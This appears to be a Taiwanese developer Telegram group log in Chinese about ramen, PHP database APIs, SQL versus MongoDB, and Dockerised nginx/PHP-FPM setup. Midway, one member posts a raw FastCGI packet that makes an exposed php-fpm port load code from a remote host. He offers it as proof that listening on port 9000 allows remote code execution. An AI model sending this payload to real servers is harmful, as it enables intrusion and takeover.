Jump to...
redirecting...

Log for YSITD

沾麵比較讚啦
湯麵啦
那為什麼不一開始直接 WeMo
嗚嗚嗚我也想吃五之神
嗚嗚嗚嗚嗚嗚我吃不起
why
沒錢ㄚ
我記得他不是三百左右ㄇ
印象中啦
可是我不能把我生活費全花掉ㄚ
可以啦
月初的時候跑去吃,滿失望的 :(
這名字也太藝術🤔
然後吃土很多天這樣ㄇ
[sticker](media:AAQCAAOFZAAC4KOCB5Z_3kpzV7tHAomFDwAEAQAHbQADmpAAAhYE@telegram)
怎麼說
我覺得蝦蝦麵好吃阿
三小XD 啊不就生僻字
可能太久沒吃吧,只是覺得超膩,而且黑胡椒有點多(
個人感覺啦
[photo](media:AgADBQADyKgxG0MYuVY8RTdKYAHb0Ox6-TIABAEAAwIAA20AA00-AgABFgQ@telegram)
很不像中文😂
懶惰鬼,都不去西抗
本來是 York Wang 不是中文啊,我只是用近似音的生僻字
+
卣 ㄧㄡˇ:名詞。古盛酒的器具,粗口大肚,口上有蓋和提梁
厒 ㄑㄧㄝˋ:名詞。水邊的山。
臦 ㄍㄨㄤˋ:???
三小 我只是用手機輸入發找ㄉ
原來讀音是錯ㄉ
厒是讀ㄎㄜˋ吧
臦就真的錯ㄌ
[sticker](media:AAQEAANbUQAC46ddBU1gcH2lidV3tnrAGgAEAQAHbQAD6gUAAhYE@telegram)
我以為iPhone用注音輸入法選字就會是讀音(−_−#)
[photo](media:AgADBQADFKkxGxAUsVaX_Sc191y-i1mGAjMABAEAAwIAA20AAwKnAAIWBA@telegram)
沒錯吧🤔
(一)ㄍㄨㄤˋ
違背。說文解字:「臦,乖也。從二臣相違。」
(二)ㄐㄩㄥˇ
人名用字。集韻.上聲.梗韻:「人名,周有伯臦,通作囧
、臩。」
我說我這邊錯ㄌ
[sticker](media:AAQEAAOvAANhD5cGs0yRyYGUJ78bDpEwAAQBAAdtAANyCQACFgQ@telegram)
}CSY/
\CSY/
\CSY/
好了 改好ㄌ
現在讀音應該不會錯ㄌ
這是加密法嘛(
[photo](media:AgADAQADQ6gxG6l_uEbZwMquZwpHXtYCCzAABAEAAwIAA20AA1oNBQABFgQ@telegram)
[photo](media:AgADBQADeakxG1yXuFaHsdwbTJlxmV13-TIABAEAAwIAA20AA7RBAgABFgQ@telegram)
@YamiOdymel 你現在分享是要給誰看啦ww
7點在轉文
你作息484壞掉ㄌ
www
在奇怪的時區(
[sticker](media:AAQFAAPfCAAC6vkAAQ2tqerX3izmpci8yzIABAEAB20AA4sSAAIWBA@telegram)
@tonyhhyip 求AA八卦
就智障沒藥醫
什麼鬼la
解釋一下
我很心累
[photo](media:AgADBQADIqkxG-fWwVad2gABKiBM6oM7r_kyAAQBAAMCAANtAAO5pwEAARYE@telegram)
Facebook 好棒棒演算法會自己往上推辣
[sticker](media:AAQFAAMQAANPmpcSkEdETNaYPyMgdsoyAAQBAAdtAAOvOQACFgQ@telegram)
不才不會 智障演算法
我現在重新分享是不是沒人會鳥我啊
跟剛剛差不多
好的
(跑
為什麼不行 🤔
只好沾麵加水做成湯麵(X
我剛睡醒
[sticker](media:AAQFAAMsAAMMYLMIGhvgnNe84-YEW8oyAAQBAAdtAAP8TgACFgQ@telegram)
484高鐵台中站Go
那你去講
[sticker](media:AAQFAAMsAAMMYLMIGhvgnNe84-YEW8oyAAQBAAdtAAP8TgACFgQ@telegram)
他要講OKTW
888888
@s3131212 講QQ
因為我不在台灣
remote
Remote
我要翻牆
你不是有漫遊ㄇ
文字版remote
是啦
你上去開(X
[sticker](media:AAQFAAMsAAMMYLMIGhvgnNe84-YEW8oyAAQBAAdtAAP8TgACFgQ@telegram)
\TeaMeow/
\TeaMeow/
[photo](media:AgADBQADz6gxG0MYuVZpR_aT9m85fvG4-TIABAEAAwIAA20AA8aoAQABFgQ@telegram)
[sticker](media:AAQFAANWAANWjcBW_CwhWcRszcv1sgIzAAQBAAdtAAPJBAACFgQ@telegram)
可樂是主體嗎
[photo](media:AgADBQAD0qgxG0MYuVbGSxJKJ3ECI-xz-TIABAEAAwIAA20AAyVAAgABFgQ@telegram)
[sticker](media:AAQCAAMzCAACU7H3AyX6DShPBglDGKFZKgAEAQAHbQADkjsAAhYE@telegram)
好好ㄛ我也想去
來啊
現在去來不及的啦
會ㄇ
不會ㄅ
兩天的活動耶
你從美國飛來都不用超過一天阿
還是你去月球了
可是不是要 票ㄇ
你只是進不去教室
還是可以在外面晃攤位
票的化
:)
我有啦
只是
我沒地方住 :)
太遠太晚
y
今天下大雨懶得出門(#)
不過可以考慮
高鐵ON
[photo](media:AgADBQAD6agxG0MYwVZR83xBtYVBBX55-TIABAEAAwIAA20AA_dFAgABFgQ@telegram)
我還沒出門诶
17 = =
你不是最近嗎www
我該帶筆電充電器ㄇ
帶啊
可是很重
我有點想用借ㄉ
算ㄌ 先帶好ㄌ
直流電源供應器ON
你需要一個簡單的後背包(?)
[sticker](media:AAQFAAN0AAN2MdIJ2JYc-DCYWzG21d8yAAQBAAdtAAOrfQACFgQ@telegram)
欸 LINE 有攤位ㄟ
為什麼大家打錯字都不修正....
有沒有人要去問他為什麼圖片會消失
@sntc06 雪人ㄉㄉ跑進來裝年輕ㄇ(X
[sticker](media:AAQFAAMFAAOTK9kdhqvSFxkf2xsc4tQyAAQBAAdtAAOFKwACFgQ@telegram)
我會安安靜靜的不打擾大家
[sticker](media:AAQFAAMFAAOTK9kdhqvSFxkf2xsc4tQyAAQBAAdtAAOFKwACFgQ@telegram)
[sticker](media:AAQFAAMFAAOTK9kdhqvSFxkf2xsc4tQyAAQBAAdtAAOFKwACFgQ@telegram)
@sntc06 沒關係樓上還有兩個陪你裝年輕
[sticker](media:AAQFAAMFAAOTK9kdhqvSFxkf2xsc4tQyAAQBAAdtAAOFKwACFgQ@telegram)
有沒有人要去問 LINE 為什麼圖片 14 天就會過期
IB101 竟然用 SKM500
太有錢ㄌ
<(_ _)>
讓你感覺他沒在存資料
兩個是三小,說清楚
@lekous docker
晚點弄 :(
現在那個你要不要試試看會不會動🤔🤔
我手邊沒 linux qq
不好試QQ
好ㄅ 我搞個環境出來44看
阿那個東西要怎麼動
大佬。
nginx 要拿來幹嘛
你 php 怎麼接 sql 的
我現在 sql 有給他一個固定 IP
config.php
你要用shell script寫一ㄍ
寫一ㄍ啥
config.php
我以為是 mysqli_connect
🤔🤔🤔🤔
誰還用mysqli_connect
我有幫你裝 mysqli 欸
我用 oop 的 mysqli qwq
賊方便
你可以直接build一個lnmp docke
我們系上的老師
好啦隨便
那你們現在都用啥
所以我在 repo 裡面找得到
dk3
config 的範例檔ㄇ
kk
都沒再用,因為我的000webhost帳戶已經被註銷
你也可以直接開一個user
叫breachtw
密碼breachtw
給他breachtw這個db的權限
SELECT INSERT UPDATE
這三個就行
root 登入
yay
um
PDO
耶 我也用PDO
PDO 🌚
PDO_MYSQL
那你幹嘛裝mysqli
我以為你會想用到
kk
嗚嗚原來你們都用 pdo 啊
我只會用落後玩意
qwq
我之前還看過在用mysql_的
沒事沒事
我前年修的課就還在用mysql_配wamp
mysqli也沒啥問題啊🤔
你要轉DB就會很痛苦
但我們老師教的是程序導向的mysqli,不是物件導向的
我是覺得不一定有差
實質上就算用統一API處理還是會可能遇到vender specific的東西
除非你從來不tune db
我基本上都只簡單select insert update
當然沒用太奇特的東西pdo比較輕鬆是事實
那是你啊
2012年的差距很明顯啦(
現在我不清楚
wut
mysqli那年沒prepare了
2012
貓貓貓貓
喔好吧
那就是很少人用
@danny8376 所以你推mysqli?
新的用pdo
原本用mysqli的不用改
當然mysqli當mysql用另當別論
反正現在教人用mysqli的都是__
網路上教學滿滿的SQLi
[sticker](media:AAQFAAMDAAOTK9kd3nBcwshyUfrfBdUyAAQBAAdtAAO8IwACFgQ@telegram)
而且那年頭pdo的prepare也是假的謝謝
現在倒是不知道預設值
反正不是自己escape問題就不在自己(?
為什麼大家都在推 PDO
QAQ
這有派系問題(?
不過如果你的PHP不OOP也只能用mysqli(?
不寫OOP卻用OOP lib根本邪教(X
(C表示
混合 OOP 和非 OOP 的程式都是邪教!
<- 我
我道歉 我完全沒OOP到
我也是( 逃
問個問題(
Node.js 有類似 PDO 的東西嘛
目前看到比較類似的大概就這個吧
你的關鍵字錯了
大佬
orm才是關鍵字
我要把我的 mysqljs/mysql 換成這個惹 開心 ❤️
他是怎麼把nosql跟rdb混在一起的
mongoose都能在nosql弄出schema了
why not
的也是
當我沒說
在你希望直接寫sql的時間點就已經non-portable了
頭都洗一半了你還是洗完吧
mongo官方說這是錯誤用法,請去RTFM
我必須說,因為很好用,所以idk
軟體開發者是否可以定義軟體ㄉ正確用法ㄋ
user說的算
開發者已死 (#
gg
您是哲學系大佬嗎
你提出的問題都好哲學
I think
Load 10000+
可以當編譯機嗎 大佬!
喔我看到了
你在解啥
[photo](media:AgADAQADSagxGzGHwUYytqPSmmsGGwbdawYABAEAAwIAA20AAzVQAAIWBA@telegram)
[photo](media:AgADAQADLagxGyBxwEbQCULKy08ejd3nawYABAEAAwIAA20AA5hAAAIWBA@telegram)
這個bug一臉不在orm
在orm實作
問問
Redis 跟 MongoDB 哪個比較棒
至少官方driver的實做沒有這樣幹
至少mongoose 不會幹這種蠢事
請你先兩個都用過再來問這問題
MongoDB 原本想學,但是他的授權條款 :D
正是因為要選擇學所以才問這種問題吧 orz
他的授權條款怎麼了?
聽說改得很不自由
你這問題跟問dog跟hotdog哪個比較棒一樣
???
兩個都學有任何衝突嗎
「聽說」
這兩個根本不同類型
所以是不一樣的東西呀(
hotdog
不會咬人
回教徒表示:
我以為 redis 和 mongodb 同類型
根本就不同用途
Nginx跟PHP哪個比較棒
大概是這種概念ㄅ
(
喔喔喔!
對於完全不能成為對方替代品的東西問哪個棒毫無意義
你可以用php寫個http server(逃
我錯怪了QwQ
用php實作nginx體驗極致笑能
你可以用redis做mongodb
redis不能deep query
再套一個BSON library他就真的能變成mongodb了
+ㄍ程式語言
全部抓出來處理阿
只是可能會不小心丟資料(X
ww
SQLite 愛你
能 MySQL 為什麼要 MongoDB
其實我不太懂有關聯性的資料為什麼要掰開成芒果
[sticker](media:AAQFAAMeAANPmpcSlp3mh3py4b1Od8oyAAQBAAdtAANWPAACFgQ@telegram)
[sticker](media:AAQFAANJAAMMYLMIb2u9gCr2__cX2csyAAQBAAdtAANoAwACFgQ@telegram)
SQL反人類
就像XML一樣
[photo](media:AgADBQADSakxG-fWwVbDDlmpzzLyno5--TIABAEAAwIAA20AA3lFAgABFgQ@telegram)
relation很棒啊
所以你是主攻 MongoDB?說明一下 SQL 為什麼反人類
[sticker](media:AAQFAAMeAANPmpcSlp3mh3py4b1Od8oyAAQBAAdtAANWPAACFgQ@telegram)
我設計什麼一直都是關聯性的資料庫,

不過搞不好你可以提出一個關聯性資料庫是屎的觀點讓我改觀
就像我 Class 跟物件導向寫到後面發現他是智障一樣
我不認為 MongoDB 是一個好的 DBMS
但是 SQL 超糟
為什麼明明同一筆資料我要分一堆 DB 放
省空間
那是你過度正規化,請把需要的資料黏在同一個 Table
就跟你切分微服務,請把需要的資料設計在同一個服務好嗎
[sticker](media:AAQFAANUAANPmpcSOvjcMd-tz-vmYcoyAAQBAAdtAAPHMAACFgQ@telegram)
這樣很正規了吧
巢狀ㄋ
我自己覺得是夠了
什麼「巢狀」
++
巢狀資料
那三小
deref?
record之類的?
deref 是什麼鳥蹦蹦
像 json 的那種
key不一定value也不一定存在
a: {'x': b}
b: {'x': a}
不是 他不會recursive
please give me a
then
boom
原則上你可以把key value pair 存成陣列
我沒有叫你 ref 啊
需要時再解回去
名曰正規化
瞎毀,你為什麼會存 JSON
然後有人覺得你TM吃飽撐著幹嘛不直接存就好
於是nosql就出來了
key value pair 的話太沒效率,因為什麼都是 varchar
[sticker](media:AAQFAAPGAQACsvp7DpjpX3gKg_eXauTfMgAEAQAHbQAD1w8AAhYE@telegram)
反正 MySQL 後來不是出了 JSON 格式嗎
蹦蹦,新世紀誕生
我就覺得你吃飽撐著
我SQL搞了半天沒搞定,mongo一小時就都搞定了
到底是什麼沒搞定
對不起QQ
全世界
[sticker](media:AAQFAAPXAAOrZjQBrYPawIVKD7RlGL4yAAQBAAdtAAMbFQACFgQ@telegram)
世界的錯
都不是你辣
[sticker](media:AAQFAANUAANPmpcSOvjcMd-tz-vmYcoyAAQBAAdtAAPHMAACFgQ@telegram)
你是不是想說人的問題
[photo](media:AgADBQAD-KgxG0MYwVaZI4G7uWYTIl21-TIABAEAAwIAA20AA9SuAQABFgQ@telegram)
正規化就會變成這樣
真的不好看就是
然後如果你的 source 跟 item 有機會重複,就可以繼續正規化成 id, source_item_id
[sticker](media:AAQFAAPGAQACsvp7DpjpX3gKg_eXauTfMgAEAQAHbQAD1w8AAhYE@telegram)
而且你塞資料進DB要下幾次SQL
[sticker](media:AAQFAANJAAMMYLMIb2u9gCr2__cX2csyAAQBAAdtAANoAwACFgQ@telegram)
一次?
[sticker](media:AAQFAANhAAMMYLMIwZ6MHNhKdnNq1csyAAQBAAdtAAMcCAACFgQ@telegram)
然後爆幹長的一句嗎
一次
才沒有機會重複
而且要調整資料結構時也很悲劇不是嗎
我記得人家twitter為了調資料結構等了一整週的樣子
度,看起來很 (?, ?), (?, ?)
根本不可讀阿
對ㄅ起
我不懂,MongoDB 類的就不會因為資料結構異動而需要花時間規劃嗎
他根本沒結構
干我屁事反正是程式產生的不是嗎
(
噢。
[sticker](media:AAQFAAMQAANPmpcSkEdETNaYPyMgdsoyAAQBAAdtAAOvOQACFgQ@telegram)
既然都不可讀,為啥不直接nosql,對人類來說就是程式中的一個物件
我當初的資料是 MongoDB 慢於 MySQL
JSON你加一個kv會需要花時間規劃嗎
現在可能改善不少了
我想存一筆資料長這樣

{
name: String
id: Number
item: [{
itemId:
amount:
}]
}
meteor用mongo
在 SQL 我要怎麼搞
3個table
一個table專門塞item
data: name, id, item_id
items: id, amount
一個塞id和name
然後再想辦法串起來
你不覺得很麻煩ㄇ
但內,第三個是什麼
你這跟我情況差不多la
在 NoSQL 我只要一個 table 欸
人家可能生出了另一個當key
噢,我看你不管什麼資料大概都可以一個 table 幹你娘塞爆
喔還有mongodb可以塞binary
喔沒事 我以為他itemidu要指去item
但內,那你分工協作的時候不就大家一起 BANG 同一張 table
MySQL也行好ㄇ
我剛剛也是有點看成這樣
現在的話一樣快
[sticker](media:AAQFAANJAAMMYLMIb2u9gCr2__cX2csyAAQBAAdtAANoAwACFgQ@telegram)
兩個 table
[photo](media:AgADBQAD-agxG0MYwVbqD9vEOunnmgaOAjMABAEAAwIAA20AA_yvAAIWBA@telegram)
[photo](media:AgADBQAD-qgxG0MYwVaWcIsLW5FKUQqBAjMABAEAAwIAA20AA6awAAIWBA@telegram)
配 Foreign key
你可能太低估NoSQL的效能了,如果遇到效能問題八成是人的問題
等一下,剛剛是不是也有人
[photo](media:AgADBQAD-qgxG0MYwVaWcIsLW5FKUQqBAjMABAEAAwIAA20AA6awAAIWBA@telegram)
[sticker](media:AAQBAAOjDwACmX-IAt7L6eN2aKeaBfz2LwAEAQAHbQAD4h0AAhYE@telegram)
[sticker](media:AAQFAANJAAMMYLMIb2u9gCr2__cX2csyAAQBAAdtAANoAwACFgQ@telegram)
倒戈了
幹你們不要害他又要砍掉重練
🤔
老人才會用 PHP + MySQL 架站喔
是說我記得 @ysitdbot 把圖片塞進mongo的wwww
你不覺得正規化是一個很機械性的動作ㄇ
看看 Facebook
我差一點點也要把音樂塞進去了
他是的
只要沒資料就永遠沒效能問題對吧🙈
然後 @licson 還是不把mongo權限開給我
那個叫做用腦思考
機械性動作就該交給機器做
當初還曾經打算把minecraft地圖塞進去 (X
Y
你要來幹啥
塞!
readonly就行好ㄇ
你上次說要開
然後就開了半年
被中華電信gank了
幹你娘有夠慢
超慘烈的下載速度
什麼時後把整個fs塞進去用mongodb開機🌚
可是local測試很快不是嗎
你可以把 MongoDB 的 file 抄走(
看 snapshot
靠邀ㄛ
過了網路剩不到十分之一
悲劇
MySQL,呀吼
我:
[sticker](media:AAQFAAMeAANPmpcSlp3mh3py4b1Od8oyAAQBAAdtAANWPAACFgQ@telegram)
local Mongodb 2秒,過了優質中華網路變20秒
超不行的啦
過我的內網(
58^2 也叫用腦思考
但是都很機械性
額 不太一樣ㄅ
然而NoSQL會遇到你讀的時候被人塞垃圾害你炸掉(?
[photo](media:AgADBQAD_KgxG0MYwVaZht_-CLb5X_iFAjMABAEAAwIAA20AA7-vAAIWBA@telegram)
突然翻到很懷念的東西
好ㄛ
你被笨料料感染ㄌ
是說2018我有得獎
好的,雷克斯
你做了什麼
忘了
當然
[sticker](media:AAQFAANUAANPmpcSOvjcMd-tz-vmYcoyAAQBAAdtAAPHMAACFgQ@telegram)
不過我還記得你畫的天才小釣手
🤔
喔喔這個
我用了一個晚上複製貼上寫完的東西
[sticker](media:AAQFAANTAAPpz2IIgQNbZQHc2-4tIb4yAAQBAAdtAAPDJAACFgQ@telegram)
這個名字有點前衛到我不知道他是什麼
我居然
Orz
把config推上去了
到底
反正就前端一個 後端一個
剩下兩個打醬油
然後我們就得幾ㄌㄤ
[sticker](media:AAQFAAMQAANPmpcSkEdETNaYPyMgdsoyAAQBAAdtAAOvOQACFgQ@telegram)
怎麼不如全部都主攻簡報呈現
簡報比賽
[sticker](media:AAQFAAPNAAOrZjQBGxB-P1rcOBOcGL4yAAQBAAdtAAOvEgACFgQ@telegram)
蹦蹦
天才小釣手
他居然變貼圖ㄌㄇ
HTTP 418
是貼圖變成 Logo
疑是喔www
酷耶
話說你今年沒來ㄛ
他在淪陷區
都沒人幫我講LT QQ
害我只能丟新聞媒體
(
然後我就接到國際漫遊了
._.
[sticker](media:AAQBAAOCJAAC2nFmBzaDGz4mEhLpdSbULwAEAQAHbQADE1AAAhYE@telegram)
是說為啥是 PHP
好開發
node.js?
就是這樣才會一堆人寫出洞
py
[photo](media:AgADBQAD4agxGyXauVa-TCgpffAxXQABs_kyAAQBAAMCAANtAAN5pwEAARYE@telegram)
一定是 @tonyhhyip
後端方便架設性
[sticker](media:AAQCAANQAQAC-YQfHJnTOOn6AAHMhlUTuA8ABAEAB20AA2p2AAIWBA@telegram)
py
uwsgi?
不然了
不是有 Flask ㄇ
然後 -nix 用 gunicorn
windows 用 waitress
怎麼想都比 PHP 還快www
1. 我不熟
你都怎麼跑gunicorn
指令直接下啊 OAOAOAO
🤔🤔🤔
[sticker](media:AAQBAAOjDwACmX-IAt7L6eN2aKeaBfz2LwAEAQAHbQAD4h0AAhYE@telegram)
我要先WTF你一波
這樣完全沒比較快
還要處理一堆有的沒的問題
test.sh 有 gunicorn
test failed
readme 有 waitress
1. 完全沒比較快
2. 你還是不能好好處理CF跟一些進階協定來的東東
啥🤔🤔🤔
我覺得 Php 環境超難搞的欸
py 只要裝好下 pip 就好ㄌ
docker 也超好處理ㄉ
[photo](media:AgADBQAD_qgxG0MYwVaZbjEYikBxc55y-TIABAEAAwIAA20AA4ZLAgABFgQ@telegram)
你是認真ㄉ還是在講幹話
VS Code 的新圖示 ❤️
真的辣
你是認真ㄉ還是在講幹話
我現在ㄉ工作就在寫 PHP
有夠難搞
你跟我講PHP環境難搞
????
你應該是說 PHP CGI 連結到 nginx ㄅ
超簡單好嗎
安裝 php 只要 sudo apt install php 就好了唷 :)
composer 整天爆炸
+++++
最難的部份
大概就是
找出 CGI 設定檔範本ㄅ
而且gunicorn靜態效能差爆
還有 VS Code 的新翻譯是怎樣
殘廢逆 zzz
找一個人上去開視訊ㄚ
你的效能
什麼都不寫都慢
你會不小心安裝到php apache plugin
笑死ww
那個是meta meta package
包了一拖拉庫東西
[photo](media:AgADBQAD_6gxG0MYwVZz0Pr6d4VJDniEAjMABAEAAwIAA20AA1euAAIWBA@telegram)
最靠北的是他會幫你連Apache都裝好,接下來你下次開機nginx就起不來
因為port被apache幹走了
好ㄅ
[photo](media:AgADBQAEqTEbQxjBVpHAotuXc4kqm6T5MgAEAQADAgADbQADpasBAAEWBA@telegram)
Arch 的 PHP 乾淨很多
嚴格上來說連前面的nginx都可以不要
直接k8s LB
https ._.
@mmis1000 話說你今天有來ㄇ
或是dev時前面什麼都沒有
有歐
正常la
我有看到你ㄇ
拔掉之後static resource更慢ㄌ
大概沒有
🤔
越拔越慘
python http就慢啊._.
我下午3點半後在408休息
101 那幾個主題看起來太工商沒什麼興趣
而且python更容易遇到supply chain attack
🤔🤔🤔🤔
右前方?
第二格
那就是有啊幹
那你不是看到我了嗎
我看著你但是你沒有認出我
我就以為是別人
我沒看到有人看到我
:(
或是你變化太大我看不出來就當沒看到
那應該是這樣
🤔 我覺得靜態我只相信nginx (
apache也還行la
+++
尼可以用 asyncio ㄚ
會ㄇ
我記得他還蠻快的欸
不過我現在開發好像都用 node.js 居多
海豹又不care那點記憶體
可愛express不管怎樣都可以直接用
還有可愛 Promise yay
也行 反正也比任何動態語言做的快(
我現在寫python都alpine + nginx + uwgsi
所以你坐在哪啊?
nginx 🤔🤔🤔
所以你環境難在哪
然而我也不會用它serve static(
我不知道
qq
我不會 nginx
你跟上面那個全世界都難一樣
apt install php就會全家桶了
這當然直接 nginx qq
不然更懶的docker run
linux 簡單辣
我開發環境是 windows
原本想幫他重構
結果看到他的程式碼
:D
直接吃整桶打包好外帶的全家桶
hyperv
然後前面再一個nginx反代
然後找任何一個正經的linux
聽起來像
docker
lfs(X
內建一個 nginx
尼還要我 compose 另一個 nginx www
nginx很瘦 可以多開一點(?
記得你必須先找一個正經的linux才能build lfs
左後方
喔不對耶
用別人build好的來build(?
裡面沒nginx
尼要給我 nginx ㄉ conf
🤔
聽起來很無限循環
你要什麼的
然後別人怎麼build(x
fastcgi直出?
我直接丟容器
nginx
直接把 conf 蓋掉
這年頭的語言不都這樣🌚
[photo](media:AgADBQADqqgxGy1_wFY4AtSslvCny4e4-TIABAEAAwIAA20AAy2vAQABFgQ@telegram)
就反正我要直接丟進去蓋就對ㄌ
我不知道尼程式怎麼寫ㄉ 我要怎麼 serve
🤔
用c++寫的c++ compiler嗎
pythonㄝ
喔喔喔
原來你要發PRㄌ
那 uwsgi(?
🤔
server {
        listen 443 ssl;
        listen [::]:443 ssl;

        server_name breach.tw;

        root /var/www/breach.tw;
        index index.php;

        location / {
                try_files $uri $uri/ =404;
        }

        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/var/run/php/php7.2-fpm.sock;
        }

        location ~ /\.(?!well-known).* {
            deny all;
            access_log off;
            log_not_found off;
        }

}

server {
        listen 80;
        listen [::]:80;

        server_name breach.tw;
        return 301 https://$host$request_uri;
}
HTTP吧
說起來我還一直沒重構FreeNAS那個PR 好懶(((
不過應該要把server_name那個拔掉
然後前面加個default
然後改成http
server {                                                       
        listen 80 default_server;
        listen [::]:80 default_server;
                                                                                                 
        listen 443 ssl default_server;                                                             
        listen [::]:443 ssl default_server;
                                         
        root /var/www/html;
        index index.php index.html;
        server_name _;

        location / {
                try_files $uri $uri/ =404;
        }

        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/var/run/php/php7.2-fpm.sock;
        }
}
你要ㄉ應該是這個
就一般phpㄉ
蓋去/etc/nginx/sites-available/default
我覺得
這我一定要改過
這個啦
不用改
因為他們不在同一個容器裡面
等等供三小
php跟nginx不在同一個容器裡
我原本想說分開來 用指定 host 的方式指過去就好
--network=host
一般好像也是這樣做
我等等放在同一個容器裡面好ㄌ
不然我看有 sock www
--mount
那這樣就要 volume 不優
不是 你為什麼要把nginx跟php分開
畢竟 docker-compose 我還是希望一鍵上線
他是cgi call耶
因為我看大家都分開咩
才沒有
你可以選擇tcp(
真的有啦
一般都用 volume
你base image是啥
然後改 nginx conf 裡面的 server_name
指向 php 容器這樣
nginx
等等什麼鬼
php
mysql
php-fpm
度度
你知道php有三個ㄇ
偶用 php-fpm
那就
不對
放在一起不是很好ㄇ
這樣你要mount兩次耶
因為 docker-compose 嘛
用這個的時候原則上會希望能分開的就分開
yay
我看大家也都分開拉
所以你寧願mount兩次?
我等等應該會寫在一起ㄅ
因為我不想動到 volume
yay
我是希望直接mount當前資料夾
蛤是喔
這樣可以邊改邊側
那我就
mount 兩次
yay
這樣config也沒比較好寫
[sticker](media:AAQBAAOCJAAC2nFmBzaDGz4mEhLpdSbULwAEAQAHbQADE1AAAhYE@telegram)
有問題再敲你 ayy
我在中國聽滅火器
666
[sticker](media:AAQFAANMBQACUM5qAWD38bJi0gtPD_r3MgAEAQAHbQADiC4AAhYE@telegram)
我可以
把 php 之類的全部丟進一個資料夾ㄇ
不行
不然我就要 mount 根目錄了
很怪
do it
🤔
丟啥啊🤔
就把整個 repo
丟進某個叫 repo 或是之類的資料夾
原本是想說不要把 docker 相關的東西也丟進去 serve
但是好像也沒插
沒差la
測試用而已
呀吼,有沒有人想學 Go
[sticker](media:AAQFAAPBAAOrZjQBw0M1oKegB3aDGL4yAAQBAAdtAAOjFwACFgQ@telegram)
會不會是你變化太大 好歹也有當兵過一會應該有變瘦(?
他現在不是已經插到 256GB DDR3 了嘛
他那台可以插到 2TB
我我我
yay
小安教我
沒有
[sticker](media:AAQCAAMLAANd6qsiwU3WnBZVtm7KW1MPAAQBAAdtAAN7MgACFgQ@telegram)
好的,晚安各位
[sticker](media:AAQCAAMuAANd6qsiN7ArN_sezsP4vfEOAAQBAAdtAAN7XAACFgQ@telegram)
快去寫docker file
他才不會去寫
你的 fastcgi_pass 有夠怪
等到他有空你早就寫好了
[sticker](media:AAQFAAOdBQACMBsWDWyco1M4qX3br87WMgAEAQAHbQAD2g8AAhYE@telegram)
一般不是 {API}:9000 之類的嗎
你的怎麽是 unix blah.sock
那是fastcgi
你484對linux不熟
🤔
那我們不能用 fastcgi ㄇ
在同一台上面不用走tcp啊 走unix socket
你該不會…不知道unix socket 是什麼?
可是我們現在假設他在不同 container :(
那個東東你就想成他是一個檔案port
我知道辣
我是說我現在想用 tcp :(
你去抄官方那個wordpress的
nono 超不優
BTW如果這個不小心被人戳到 直接rce
聽在9000根本是找死做法
snippets/fastcgi-php.conf 是啥
test docker算了就是
test failed
nnn 我直接內部連接
不 expose
ssrf之類的
php-fpm提供的東東ㄅ
[sticker](media:AAQFAAMsAAMMYLMIGhvgnNe84-YEW8oyAAQBAAdtAAP8TgACFgQ@telegram)
好啦我還是裝同一台 QQ
不會吧
你開台給我戳
等我一下(
不用開ㄌ
我直接跟你講怎麼戳la
🤔
\x01\x01ab\x00\x08\x01\xFF\x00\x01\x00\x01\x01\x01\x01\x01\xFB\x01\x04ab\x00\x3E\x01\xFF\x093PHP_VALUEauto_prepend_file\x3Dhttp\x3A//ao.pe\x0Aallow_url_include\x3DOn\xFB\x01\x04ab\x00\x00\x01\xFF\xFB
然後再隨便開一個php
就rceㄌ
送給fastcgi port
好ㄇ
超簡單
再亂噴R
喔這邊還有腳本可以用
如果開 fcgi 的不是 php-fpm 呢(
這個是 php-fpm 的漏洞喔 🤔
還是 php-fcgi 也有事
docker裡沒開也跟本戳不到啊🤔
ssrf la
還有很多不小心噴出來的
一般都Unix socket比較多吧🤔
額 那三小
那不是同個東西嗎
不是
而且那不是漏洞
那是feature
🤔 我覺得unix socket跟tcp都一樣啊
沒擋好server side都戳得到
不才不行
一個是檔案
你要open然後寫入
難度差多了
你要能寫檔 都能rce了好嗎(
啊不然那什麼 解釋一下
@seadog007 config 怎麼用
看你走的api啊
unix socket也能很socket好嗎
再說除非你nginx apache每個app都獨立跑一個
不然通常也都是同一個user一起用
就 丟那
一個是單純的 fastcgi server
一個是會自己控制放多少線程的
丟著就對了 等使用者戳嗎
可是那是php feature
而且以前 IRC 時代我也解釋過分別啊
我 mount 整個根目錄欸 🤔
那我還需要生成嗎
unix socket就是個檔案啊...
config.php?
y
[photo](media:AgADBQADGKkxGyhmwVZBc88I_N4sRqB5-TIABAEAAwIAA20AA6ZIAgABFgQ@telegram)
走fastcgi都會啊🤔
現在的狀況是這樣啦
那我掛在根目錄喔
然後要import sql
有喔
[sticker](media:AAQFAAMBAAOTK9kddbKFFz3YMSWj99QyAAQBAAdtAAPyIgACFgQ@telegram)
然後後面兩句我看不懂
我要生成什麼
[photo](media:AgADBQADBKkxG0MYwVaLGbyK_I130dei-TIABAEAAwIAA20AA2quAQABFgQ@telegram)
我這個直接掛根目錄 /config.php 可以嗎
還是你要吃環境變數進去
/src/config.php
[photo](media:AgADBQAD2qgxGzf9wVZUvht5vRQnI22MAjMABAEAAwIAA20AA4OwAAIWBA@telegram)
真的還假的
假的
去看SITCON
掛 src 底下齁
有人還在台科大旁邊嗎
原因不是這個…所以是真的停電歐?
4
總務處目前說是總站設備損毀啦
🤔 我大概懂狀況了
然而能戳tcp的api也是有些能拿來戳unix socket的🤔
而且也不是沒人用777的socket的 🙈
我在成大4年唯一一次停電是變電所被雷擊來著
很少la
重點是很少api能戳
我覺得777毫無疑問是人災
我要去蹭你的資料庫位址惹
你不覺得tcp該封起來的給人戳得到也是人災嗎
又不是說沒防火牆能用(((
localhost
是說有些程式遇到777會強行panic防止災害,像是ssh之類
我 蹭 我 自 己,,,
php會嗎?
我覺得unix socket 777還好耶
我覺得不會
那是fpmㄅ
不是php
ssh是因為用777本身沒道理啊
跑服務的東西的unix socket不一定沒道理好嗎
給大家用
777沒啥問題ㄅ
postgresql
redis
😌😌
然後還是能ssrf R 🌚
Oracle PL/SQL
不要
雖然我第一次用 Oracle SQL 覺得他跑非常慢
不能R
不過unix socket能走的機會比tcp少到是真的啦
gopher戳不到unix socket
但是只要用對的硬件就跑得飛快
pgsql的sp-gist是最強的
不然你oracle跑個bktree/groonga給我看
😐
而且現在流行 in-memory DB
SAP HANA 的天堂
